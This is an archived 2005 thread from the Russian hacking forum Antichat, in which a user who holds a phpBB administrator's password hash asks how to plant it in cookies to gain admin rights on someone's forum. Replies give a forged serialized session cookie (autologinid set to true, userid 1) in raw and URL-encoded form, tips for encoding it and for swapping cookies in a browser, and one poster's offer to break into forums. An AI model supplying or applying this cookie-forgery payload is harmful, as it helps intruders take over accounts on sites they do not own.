Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Есть хеш админа форума phpBB.Можно ли заменитьть куки, чтобы получить права админа? (https://forum.antichat.xyz/showthread.php?t=6370)

proff 04.05.2005 14:42

Есть хеш админа форума phpBB.Можно ли заменитьть куки, чтобы получить права админа?
 
У меня имееться хеш админа форума phpBB могули я подставить ево в кукисы чтоб получить права админа.
Форум скорее всего phpBB-2.0.14.
Если да то пожалуста напишите как и поподробнее.
Очень буду благодарен.

(-=util=-) 04.05.2005 19:54

А почему нет? Меняй id и хэш соотвтств админу и вперёд.

proff 04.05.2005 21:57

Там что то типа этого:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2221%22%3B% 7D
Можно по подробнее с подстановкой?

(-=util=-) 04.05.2005 22:03

Нет проблем.
Вот куки:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:3:"1";}

1-id

вот так он кодируется:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A3%3A%221%22%3B%7D

http://www.albionresearch.com/misc/urlencode.php декодирование вот только по поводу хэша точно неотвечу. т.к. давно незанимался. и меняй лучше куки оперой или мазилой

proff 04.05.2005 22:44

Можно поподробней мне вот такой хеш нужно подставить 7ea1918c1ee062187e0d7f69ea600a4f ну и соответственно id 2 может кто поможет?

OLIVER 05.05.2005 03:01

я думал эта дыра закрыта...

censored! 05.05.2005 13:02

Цитата:

http://www.albionresearch.com/misc/urlencode.php декодирование
Можно и через www.ya.ru кодировать и декодировать.
Заходим, вводим любое слово для поиска, жмем поиск. Потом в адресной строке заметаем наше слово для поиска и пихаем нужное: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2221%22%3B% 7D
и смотрим что мы пытались найти: a:2:{s:11:"autologinid";s:0: 2";s:6:"userid";s:2:"21";}
Меняем на нужное нам и опять жмем поиск. Потом уже из адресной строки вытаскиваем типа закодированное.
...
А вообще, в phpBB последних версиях что-то не получается куку подкинуть. Может я просто криворукий... :(

FoX's 05.05.2005 13:08

Цитата:

А вообще, в phpBB последних версиях что-то не получается куку подкинуть. Может я просто криворукий...
Их по ходу прикрыли... в phpBB 2.0.14 такого нет..

Alpha White Jordan 05.05.2005 13:14

А пасс брутится в 2.0.14?

Кто хочет чтобы Я взломал форум 2.0.14, давайте мне пасс от Админки, и Я вам этот движок взломаю.

FoX's 05.05.2005 13:21

Иди скачай форум.. зарегься на бесплатном хосте.. и ломай сколько влезит..


Время: 21:08